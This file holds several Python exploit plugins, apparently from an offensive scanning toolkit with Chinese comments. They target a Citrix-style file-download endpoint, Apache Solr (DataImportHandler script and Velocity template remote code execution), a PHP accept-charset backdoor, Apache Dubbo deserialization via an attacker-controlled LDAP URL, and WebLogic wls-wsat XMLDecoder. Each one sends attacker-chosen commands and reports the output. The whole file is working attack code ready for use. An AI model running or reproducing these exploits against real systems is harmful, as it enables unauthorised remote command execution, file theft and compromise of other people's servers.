def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command").replace("/", "%2f")
try:
payload_url = scheme + "://" + url + ":" + str(port)
session = requests.Session()
create_session(session, payload_url, proxies, RandomAgent)
value = get_rand(session, payload_url, proxies, RandomAgent)
create_session(session, payload_url, proxies, RandomAgent) # 再次创建连接
payload = command
read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
headers = {
'User-Agent': RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
'Content-Type': 'application/xml',
'X-NITRO-USER': randoms().result(8),
'X-NITRO-PASS': randoms().result(8),
'rand_key': value
}
data = '<clipermission></clipermission>'
resp = session.post(url=read_file_payload,
headers=headers,
timeout=6,
data=data,
verify=False,
proxies=proxies)
con = resp.text
ExploitOutput().Banner(OutputData=con) #回显调用函数
_t = VulnerabilityInfo(con)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command").replace(' ','+')#对空格进行处理
try:
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(port) + '/solr/admin/cores'
step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'application/json',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"
}
data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=" + name + "&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(command)
resp = requests.post(payload_url, data=data2, headers=headers, proxies=proxies, timeout=6, verify=False)
ExploitOutput().Banner()#无回显调用函数
_t = VulnerabilityInfo(resp.text)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print("\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m")
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +" || Exploit", e) # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command")
try:
payload = "/index.php"
commandS = ('''system("{}");''').format(command)
cmd = base64.b64encode(commandS.encode('utf-8'))
payload_url = scheme + "://" + url + ':' + str(port) + payload
headers = {
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '******',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Sec-Fetch-Site': 'none',
'accept-charset': cmd,
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': RandomAgent
}
resp = requests.get(payload_url,
headers=headers,
timeout=5,
proxies=proxies,
verify=False)
con = resp.text
ExploitOutput().Banner() #无回显调用函数
_t = VulnerabilityInfo(con)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
ExploitUrl = kwargs.get("ExploitUrl")
try:
client = DubboClient(url, int(port))
JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://" + ExploitUrl,
strMatchColumns=["foo"])
JdbcRowSetImplClass = new_object(
'java.lang.Class',
name="com.sun.rowset.JdbcRowSetImpl",
)
toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean',
beanClass=JdbcRowSetImplClass,
obj=JdbcRowSetImpl)
resp = client.send_request_and_return_response(
service_name=
'org.apache.dubbo.spring.boot.sample.consumer.DemoService',
# 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
method_name='$invoke',
args=[toStringBean])
ExploitOutput().Banner() #无回显调用函数
_t = VulnerabilityInfo(str(resp))
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command")
linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>{}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(command)
windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>C:\Windows\System32\cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>{}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''.format(command)
data = ""
if kwargs.get("OperatingSystem") == "windows":
data = windows_data
elif kwargs.get("OperatingSystem") == "linux":
data = linux_data
try:
payload = '/wls-wsat/CoordinatorPortType'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "text/xml",
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
ExploitOutput().Banner() #无回显调用函数
_t = VulnerabilityInfo(con)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
command = kwargs.get("Command").replace(' ', '+') #对空格进行处理
try:
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url,
timeout=6,
proxies=proxies,
headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/config"
payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
command)
payload_url1 = scheme + "://" + url + ":" + str(port) + payload
payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
payload_data = """{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}"""
headers1 = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
}
resp = requests.post(payload_url1,
data=payload_data,
headers=headers1,
proxies=proxies,
timeout=6,
verify=False)
resp2 = requests.get(payload_url2,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con2 = resp2.text
ExploitOutput().Banner(OutputData=con2) #无回显调用函数
_t = VulnerabilityInfo(resp.text)
Exploit(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
print(
"\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
)
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
" || Exploit", e) # 调用写入类传入URL和错误插件名